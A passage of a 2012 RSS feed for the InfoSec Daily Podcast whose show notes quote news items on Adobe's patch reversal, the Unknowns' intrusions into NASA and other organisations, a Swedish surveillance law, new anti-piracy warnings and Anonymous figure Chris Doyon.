style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> effectively charging</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> for security fixes.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Adobe</span><a href="http://www.h-online.com/news/item/Adobe-Photoshop-is-not-a-target-for-attackers-1572717.html"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> responded</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> to that by saying that it did not believe that Photoshop was a target for attackers and that this was the reason why it did not create fixes for the versions that are two years and one year old, even though they are still on many stores&#39; shelves and in use around the world. </span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://securityaffairs.co/wordpress/5190/security/the-unknowns-hackers-revenge-in-the-name-of-security.html"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://securityaffairs.co/wordpress/5190/security/the-unknowns-hackers-revenge-in-the-name-of-security.html</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Another group of hacker named The Unknowns has hacked several organizations, including NASA and the U.S. Air Force, and posted evidence of their actions. The complete list has been published in a message on PasteBin:</span></p>
<ol style="margin-top:0pt;margin-bottom:0pt;">
<li style="list-style-type:decimal;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">NASA &ndash; Glenn Research Center</span></p>
</li>
<li style="list-style-type:decimal;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">US military</span></p>
</li>
<li style="list-style-type:decimal;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">US AIR FORCE</span></p>
</li>
<li style="list-style-type:decimal;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">European Space Agency</span></p>
</li>
<li style="list-style-type:decimal;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thai Royal Navy</span></p>
</li>
<li style="list-style-type:decimal;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Harvard</span></p>
</li>
<li style="list-style-type:decimal;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Renault Company</span></p>
</li>
<li style="list-style-type:decimal;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">French ministry of Defense</span></p>
</li>
<li style="list-style-type:decimal;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Bahrain Ministry of Defense</span></p>
</li>
<li style="list-style-type:decimal;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Jordanian Yellow Pages</span></p>
</li>
</ol>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In the message published on Pastebin the group has declared war to everybody, they promised hacks against &ldquo;all the other websites out there,&rdquo;. Very strange the proposal that the group sent to every company requesting to be contacted by them before they will be target of their attack, they are proposing to help potential victims to fix their potential vulnerabilities.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;Contact us before we take action and we will help you, and will not release anything&hellip;. It&rsquo;s your choice now.&rdquo;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://sverigesradio.se/sida/artikel.aspx?programid=2054&amp;artikel=5103862"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://sverigesradio.se/sida/artikel.aspx?programid=2054&amp;artikel=5103862</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Swedish government has decided to pass a hotly debated law regulating the monitoring of phone and internet activity.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The law regulates how and when the police will be able to listen in on phone conversations and monitor internet activity.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to the law, the police would be able to monitor people&#39;s activity on the internet and on the phone in secret, even before those people have been suspected of a crime.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Social Democrats and the liberal parties are both in favour of the decision to pass the law, and agreed on the importance of being able to listen in on telephone conversations in crime and sexual abuse cases, as well as internet crime.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">One of the most controversial issues regarding the new law is whether the police should have to right to crack down on petty internet crime. Jens Holm of the Left Party was one of the MPs who was critical of the law.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;In that case you would end up with the police being allowed to hunt down file-sharers, and then I think you&#39;ve gone wrong&quot;, he told Swedish National Radio.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://news.softpedia.com/news/US-Government-Issues-Two-New-Anti-Piracy-Warnings-for-DVD-and-Blu-Ray-269349.shtml"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.softpedia.com/news/US-Government-Issues-Two-New-Anti-Piracy-Warnings-for-DVD-and-Blu-Ray-269349.shtml</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In case you were bored with the old FBI warning and anti-piracy notifications that you were presented with before the start of a movie, fear not. The US government issued a couple of brand-new copyright notices that are designed not only to inform users on the fact that piracy is illegal, but also to educate them.</span><img height="494px;" src="https://lh3.googleusercontent.com/KCSwEQ5zoS9dMXL8lBrBWTjL1sNdSUv5Dtn6msjlPdY2hM3wC33GxW_Wc0XhyL4ieJ4jnCZGhnJjPCcFWZBSOxhlEUQZ7ug5_OiG5eLWIfZzrTT6j6c" width="640px;" /></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">United States authorities have been fighting a long battle against copyright infringers, shutting down their operations and putting many of them behind bars, but now they&rsquo;ve decided to give movie studios a small present.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ArsTechnica</span><a href="http://arstechnica.com/tech-policy/2012/05/dvds-and-blu-rays-will-now-carry-two-unskippable-government-warnings/"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> informs</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> that six major studios have already agreed to use the new notices in the motion pictures they sell on DVD and Blu-Ray.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The first new screen features both the FBI&rsquo;s anti-piracy warning logo and the one of Homeland Security Investigations. It notifies the viewer that the unauthorized reproduction of the material is prohibited by the law, but it also highlights the $250,000 (190,000 EUR) fine and the 5-year prison sentence that awaits those caught pirating copyrighted works.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The second banner, the educational one, bears the logo of the National Intellectual Property Rights Coordination Center, along with a message that says &ldquo;Piracy is not a victimless crime.&rdquo;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The purpose of this message is apparently to make the user aware of the fact that many individuals and companies may suffer because of piracy.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to US Immigration and Customs Enforcement (ICE) representatives, the new screens will be displayed after the previews, when the play button is hit. Each of them will remain on the screen for 10 seconds.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;</span><a href="http://rt.com/usa/news/anonymous-us-doyon-world-219/"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://rt.com/usa/news/anonymous-us-doyon-world-219/</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Businesses have suggested it. The government has all but confirmed it. And according to one alleged member, they both might very well be right. A hacker tied to Anonymous says the loose-knit collective may be the most powerful organization on Earth.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;The entire world right now is run by information,&rdquo; Chris Doyon tells Postmedia News from an undisclosed location in Canada. &ldquo;Our entire world is being controlled and operated by tiny invisible 1s and 0s that are flashing through the air and flashing through the wires around us. So if that&rsquo;s what controls our world, ask yourself who controls the 1s and the 0s&rdquo;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;It&rsquo;s the geeks and computer hackers of the world,&rdquo; says Doyon.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In a world where the most critical of information isn&rsquo;t locked up in vaults but instead encoded in easily obtainable binary, Doyon says that crackers like those in Anonymous are in possession of some of the most powerful knowledge known to man.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Doyon, who is reported to be in his late 40s, was charged last year for partaking in a Distributed Denial of Service attack on the website for the county of Santa Cruz, California. Since February, however, he has resided in Canada after using what he says is the new &ldquo;underground railroad&rdquo; to escape persecution for alleged computer crimes in the States.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Authorities say that, under the handle of Commander X, Doyon acted as a ringleader of sorts of the Anonymous collective, an operation described by its own participants as one that lacks leadership altogether.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;If you are asking me if he&#39;s an activist and tried to change the world for better. Yes, he did. I don&#39;t know if that makes him a member of Anonymous, but he is certainly an activist working on social change for the betterment of mankind,&quot; his attorney, Jay Leiderman, told Cnet in September.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;Yes, I am immensely proud and humbled to my core to be a part of the movement known as Anonymous,&quot; Doyon reportedly told reporters upon leaving a California courthouse last year.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Regardless of if he can actually be linked to the organization &mdash; and to what degree &mdash; Doyon says that the group is capable of more than one might imagine.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;Right now we have access to every classified database in the US government. It&rsquo;s a matter of when we leak the contents of those databases, not if,&rdquo; says Doyon.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It wasn&rsquo;t computer nerds slaving over codes to help crack the system uncover that info either, says Doyon.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;You know how we got access?&rdquo; asks Doyon. &ldquo;We didn&rsquo;t hack them. The access was given to us by the people who run the systems. The five-star general (and) the Secretary of Defense who sit in the cushy plush offices at the top of the Pentagon don&rsquo;t run anything anymore. It&rsquo;s the pimply-faced kid in the basement who controls the whole game, and Bradley Manning proved that. The fact he had the 250,000 cables that were released effectively cut the power of the US State Department in half. The Afghan war diaries and the Iran war diaries effectively cut the political clout of the US Department of Defense in half. All because of one guy who had enough balls to slip a CD in an envelope and mail it to somebody.&rdquo;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;There&rsquo;s a really good argument at this point that we might well be the most powerful organization on Earth. The entire world right now is run by information,&rdquo; he adds.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Doyon landed in hot water after he allegedly launched a DDoS attack against authorities the Santa Cruz website after the county imposed a ban on outdoor camping. According to authorities, Doyon engaged in the assault in December 2010, nearly a year before the Occupy Wall Street movement encouraged protestors to camp outdoors in public spaces from coast to coast. In September 2011 he was formally charged in the DDoS attack and fled to Canada five months later. Had he stayed in the US, he would have been prohibited from using social networking sites like Facebook and Twitter, as well as chatroom clients that connect to IRC networks.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;They&#39;ve taken away my freedom of speech,&quot; he explained to the Santa Cruz Sentinel at the time.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">[end]</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-667-abobe-responds-csis-notes-the-unknowns-swedish-monitoring-and-new-warnings/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3934/0/infosec-daily-podcast-episode-667.mp3" length="21523063" type="audio/mpeg" />
		<itunes:duration>0:44:50</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 667 for May 14, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Adrian Crenshaw, Beau Woods, and Karthik Rangarajan.
&#160;
Announcements
GraniteSec (formerly The New England Inf[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 667 for May 14, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Adrian Crenshaw, Beau Woods, and Karthik Rangarajan.
&#160;
Announcements
GraniteSec (formerly The New England InfoSec Tweetup)
	When: &#160;May 19, 2012&#160;&#160;&#160; 
	Where: &#160;Veasey Memorial Park, Groveland, MA
	http://granitesec.org
&#160;
AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center &#8211; Huntington, West Virginia
	http://www.appyide.org/
&#160;
LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
&#160;
Security 504: Hacker Techniques, Exploits &#38; Incident Handling &#8211; Matt Romanek
	When: June 20 &#8211; 27, 2012
	Where: Courtyard Seattle Federal Way, WA 
	http://www.sans.org/mentor/details.php?nid=28014
&#160;
Social Engineering Training
When: July 21-24, 2012
	Where: Black Hat Vegas
When: August 20-24, 2012
	Where: &#160;Bristol, UK
When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD
	http://www.social-engineer.com/social-engineer-training
&#160;
Inside and Out of the Social-Engineer Toolkit (SET)
	When: July 21 &#8211; 22, 2012
	When: July 23 &#8211; 24, 2012
	Where: Black Hat Vegas
	http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html

DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
&#160;
Hack3rCon^3
When: October 19-21, 2012
Where: Charleston, WV 
	http://hack3rcon.org/ 
&#160;
Skydogcon
	When: October 26-28
	Where: Hotel Preston in Nashville, TN 
	http://www.skydogcon.com 
&#160;
Stories
Source: &#160;http://www.h-online.com/security/news/item/Adobe-backs-down-will-release-patches-for-critical-holes-1574341.html
Adobe has announced &#8211; through changes to the security advisories it issued earlier this week &#8211; that it is developing patches for the critical holes in the CS5.x versions of Adobe Photoshop, Illustrator and Flash Professional, after previously advising users that they needed to buy the just-released CS6 versions of the applications.
The revised advisories retain the suggestion that users should upgrade but also now state, for example, &#34;We are in the process of resolving these vulnerabilities in Adobe Photoshop CS5.x, and will update this Security Bulletin once the patch is available&#34;. Adobe has given no schedule for the availability of patches.
In the original 8 May advisories, the company had said only that users of these products would need to purchase the upgrade from the CS5 and CS5.5 versions to the, just shipping on 7 May, CS6 versions to close the critical holes they were detailing; a move that was seen as effectively charging for security fixes.
Adobe responded to that by saying that it did not believe that Photoshop was a target for attackers and that this was the reason why it did not create fixes for the versions that are two years and one year old, even though they are still on many stores&#39; shelves and in use around the world. 
&#8230;
Source: &#160;http://securityaffairs.co/wordpress/5190/security/the-unknowns-hackers-revenge-in-the-name-of-security.html
Another group of hacker named The Unknowns has hacked several organizations, including NASA and the U.S. Air Force, and posted evidence of their actions. The complete list has been published in a message on PasteBin:


NASA &#8211; Glenn Research Center


US military


US AIR FORCE


European Space Agency


Thai Royal Navy


Harvard


Renault Company


French ministry of Defense


Bahrain Ministry of Defense


Jordanian Yellow Pages


In the message published on Pastebin the group has declared war to everybody, they promised hacks against &#8220;all the other websites out there,&#8221;. Very strange the proposal that the group sent to every company requesting to be contacted by them before they will be target of their attack, they are proposing to help p[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 666 &#8211;  No Devil Here!, Vladimir Putin, InformationWeek 2012 Strategic Security Survey, Flash-crippling, Targeting Applications</title>
		<link>http://www.isdpodcast.com/episode-666-no-devil-here-vladimir-putin-informationweek-2012-strategic-security-survey-flash-crippling-targeting-applications</link>
		<comments>http://www.isdpodcast.com/episode-666-no-devil-here-vladimir-putin-informationweek-2012-strategic-security-survey-flash-crippling-targeting-applications#comments</comments>
		<pubDate>Sat, 12 May 2012 00:53:34 +0000</pubDate>
		<dc:creator>Karthik.Rangarajan</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3929</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 666 for May 11, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Geordy Rostad. &#160; Announcements GraniteSec (formerly The New England InfoSec Tweetup) When: &#160;May 19, 2012&#160;&#160;&#160; Where: &#160;Veasey Memorial Park, Groveland, MA http://granitesec.org &#160; AIDE 2012 When: May 21-25, 2012 Where: MU Forensic Science Center [...]]]></description>
			<content:encoded><![CDATA[<p dir="ltr" id="internal-source-marker_0.7191521854742885" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 666 for May 11, 2012. &nbsp;</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Geordy Rostad.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Announcements</span></p>
